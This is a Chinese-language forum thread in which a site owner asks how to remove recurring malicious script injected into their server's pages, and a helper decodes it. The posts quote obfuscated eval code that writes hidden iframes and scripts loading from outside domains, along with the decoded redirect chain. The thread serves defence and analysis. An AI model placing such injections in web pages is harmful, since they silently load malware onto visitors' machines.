以下是这三天来被挂的马：
if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='hello=Yes;path=/;expires='+expires.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('8.o(\'<k f=d l=b://h.j.7/5/g.e?3></k><c 9=0 n=0 l="b://p.m.6/i/1/q.a?4嚄2"></c>\')',62,27,'|2008|4|44|7|ask|cc|com|document|height|htm|http|iframe|javascript|js|language|log|lx|new|niupan|script|src|taozhi|width|writeln|www|yt'.split('|'),0,{}));}

<script language="javascript">
if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='hello=Yes;path=/;expires='+expires.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('5.m(\'<j e=c k=a://n.i.g/2/3/d/7.6?嚄2></j><b 8=0 l=0 k="a://f.h.4/o/p/q.9?嚄2"></b>\')',62,27,'||art|cache|com|document|gif|google|height|htm|http|iframe|javascript|label|language|lx|net|niupan|qywy|script|src|width|writeln|www|xingxuetupian|xixixi|yt'.split('|'),0,{}));}
</script>

请高手们帮帮忙，我的QQ:1121061186
先谢谢了

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; QQDownload 551; GTB6.3; CIBA; .NET CLR 2.0.50727; 360SE)

没人知道怎么处理吗，呜呜

瑞星的兄弟在吗
能帮我看看服务器吗
我已经搞了两天了
还没有找到
程序都翻了一遍，还是没有找到根源

被挂马
看一下
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('8.o(\'<k f=d l=b://h.j.7/5/g.e?3></k><c 9=0 n=0 l="b://p.m.6/i/1/q.a?4嚄2"></c& gt;\')',62,27,'|2008|4|44|7|ask|cc|com|document|height|htm|http|iframe|javascript|js|language|log|lx|new|niupan|script|src|taozhi|width|writeln|www|yt'.split('|'),0,{}));}
这是段eval加密，解密后得到
document.writeln('<script language=javascript src=http://lx.niupan.com/ask/log.js?44></script><iframe height=0 width=0 src="http://www.taozhi.cc/new/2008/yt.htm?7?"></iframe& undefined;')

关于:解密的日志(全体输出 -  13):

Level  1>http://lx.niupan.com/ask/log.js?44
Level  2>http://web.51.la/go.asp?svid=8&id=3383360&tpages=+a3360ops+&ttimes=+a3360ot+&tzone=+
Level  2>http://lx.niupan.com/biyunchangshi/guagua/yt.htm?9嚄4
Level  3>http://lx.niupan.com/biyunchangshi/guagua/kl.jpg
Level  3>http://lx.niupan.com/biyunchangshi/guagua/rl.jpg
Level  3>http://lx.niupan.com/biyunchangshi/guagua/ml.jpg
Level  3>http://lx.niupan.com/biyunchangshi/guagua/nop.jpg
Level  1>http://www.taozhi.cc/new/2008/yt.htm?7嚄4
Level  2>http://www.taozhi.cc/new/2009/yt.htm?914
Level  3>http://www.taozhi.cc/new/2009/kl.jpg
Level  3>http://www.taozhi.cc/new/2009/rl.jpg
Level  3>http://www.taozhi.cc/new/2009/ml.jpg
Level  3>http://www.taozhi.cc/new/2009/nop.jpg

analyzed by 是昔流芳

把这样的eval清除即可

已经清除了
可第二天他又加入了
很头疼
程序我查了一遍
朋友，你能帮帮我吗
我的QQ:1121061186

我的服务器被
niupan.com
taozhi.cc
这两个网站挂马了
清除后，第二天又会出现
有什么好的建议
瑞星有适合win2003的吗

如果清除以后还会出现，那就检查一下服务器的安全性，修补一下漏洞，查看一下安全设置

好滴，谢谢你
我先设置一下